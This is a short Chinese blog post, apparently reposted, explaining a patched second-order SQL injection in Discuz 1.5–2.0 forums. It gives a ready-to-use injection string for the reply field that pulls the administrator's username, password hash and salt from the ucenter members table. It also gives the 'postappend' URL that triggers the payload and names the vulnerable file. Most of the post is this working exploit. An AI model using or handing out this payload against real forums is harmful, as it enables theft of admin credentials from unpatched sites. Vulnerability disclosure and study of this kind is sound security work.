Discuz 1.5 - 2.0 二次注入细节(已出补丁) - 网站安全

By：jannock

今天才发现，discuz 昨天又出补丁了。唉，又少一个玩了。这里说一下细节让大家共同学习一下吧。

在发表回复的地方输入注入语句：

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

然后到回复补充那里随便补充一下，注入语句就被执行。

补充的地址： HdhCmsTest2cto测试数据

forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}

上面的语句就会把取得的内容写进回复主题返回。

漏洞文件：

source\module\forum\forum_misc.php

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11516

更新时间：2022-09-13 阅读：57次